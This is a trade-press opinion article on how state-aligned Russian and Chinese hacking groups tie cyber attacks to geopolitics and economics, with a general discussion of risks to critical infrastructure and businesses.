SecurityBrief UK - Technology news for CISOs & cybersecurity decision-makers
Story image

The new way international politics could affect your life: cyber attacks

Thu, 27th Jun 2024

If your power was suddenly cut off, could it be blamed on property prices in China? Perhaps. While the original Cold War was fought using proxies, espionage, and propaganda, the new cold war takes place online. State-aligned and state-sponsored groups launch cyber attacks against enemies to steal secrets, extract ransoms, and sometimes just to sow chaos. Governments are keen to protect critical national infrastructure (CNI), such as energy and communications, not only from random hackers but from targeted politically motivated cyber attacks.

Hacking in itself has become part of a proxy war, where governments are so disconnected from the groups operating they have plausible deniability. While some nations use it as a way to gain a political or tactical advantage in warfare, some countries, such as China, also rely on it to advance their own economy. With political tensions showing no sign of cooling off and economies remaining unsteady, there is increased activity from a number of state sponsored actors. 

Understanding the threat landscape is no longer as simple as tracking criminal activity, we need to be more aware of movements in global politics and economics so as to better anticipate the next attack. 

How governments and cyber criminals work together
The ongoing conflicts in Ukraine and Israel have global implications that extend into cyberspace. But why? Ultimately it comes down to where they are based, and that region's interests—and most groups operate in Russia, in 2022 it was reported that 74% of ransomware revenue goes to Russia-linked groups, and the majority of forums where cyber criminal business is discussed are in the Russian language. 

Russia has earned this reputation for playing a major role in cyber crime because its government allows hackers to operate as long as they "play along". Groups are free to operate as long as they target adversaries and not allies. Many forums and groups will have rules that state those within the Commonwealth of Independent States (the former Soviet Union) are not to be targeted. This means that the hackers can make money safely, and the government benefits from the disruption. It's a win-win. 

These close ties mean that any geopolitical instability that impacts Russia or its allies will have a direct impact on cyber criminal activity. Our own research indicates that the price of stolen credentials for organisations in Israel have increased due to the demand, and this correlates with the Russian government taking an anti-Israel stance.    

How hackers operate in China
Hackers operating in China are a little different. Like their Russian counterparts, they align themselves with the strategic objectives of their government. However, Chinese hackers steal foreign intellectual property (IP) to give their own industries a competitive advantage. 

These campaigns target sectors such as telecommunications, finance, and government entities. Over the years, analysts have identified several groups known to be affiliated with the PRC, including  MustangPanda, VoltTyphoon and Gallium. These groups are less interested in disruption but rather theft, particularly credential theft. They use tactics designed to remain under the radar, such as living-off-the-land binaries (LOTLB), legitimate tools within a system trusted by systems admins but exploited by hackers to carry out malicious activity.

Gallium has used LOTLB as part of several operations while remaining undetected. The group is well known as part of Operation Soft Shell, which targets global telecoms and Microsoft Exchange servers, stealingIP from telecommunication, financial, and government entities in Southeast Asia, Europe, Africa, and the Middle East. Another group, Sandman targets telecommunication providers in the Middle East, Western Europe, and South Asia using a novel backdoor that abuses the LuaJIT platform to deliver malware. MustangPanda focuses on Southeast Asian governments, while VoltTyphoon targets U.S. CNI for intelligence-gathering purposes in alignment with the requirements of the PRC. Each has found a niche, and all are at least tolerated by the government.

Cyber espionage and you
For many of us, we're privileged that our day-to-day existence is unaffected by world politics. There are effects, but they're not always obviously linked—energy prices are higher, interest rates change, industries have to adapt to new tariffs, and so on. Nation state-sponsored and affiliated cyber crime changes this.

Most obvious is the risk of disruption. The aim of disrupting CNI exists because disrupting everyday life is an effective thing to do. If people do not have reliable access to electricity for long periods, or hospitals are unable to provide care due to cyber attacks, this can very easily have a destabilising effect on a government.

The less disruptive tactic of theft will also mean targeting ordinary people. While movies often depict hackers typing rapidly to "defeat firewalls", the reality is that people are often the weakest link in any cybersecurity setup, falling victim to phishing emails and similar attacks. Ransomware or more insidious attacks could be a group trying to make money—or it could be a state-affiliated group looking to steal secrets from an employer.

When auditing the risk of cyber attack, businesses need to consider not just how they could be exploited for ransomware but whether they could fall victim to a more politically motivated attack. The different motives in play means that a business doesn't have to be of national importance to be at risk.

Follow us on:
Follow us on LinkedIn Follow us on X
Share on:
Share on LinkedIn Share on X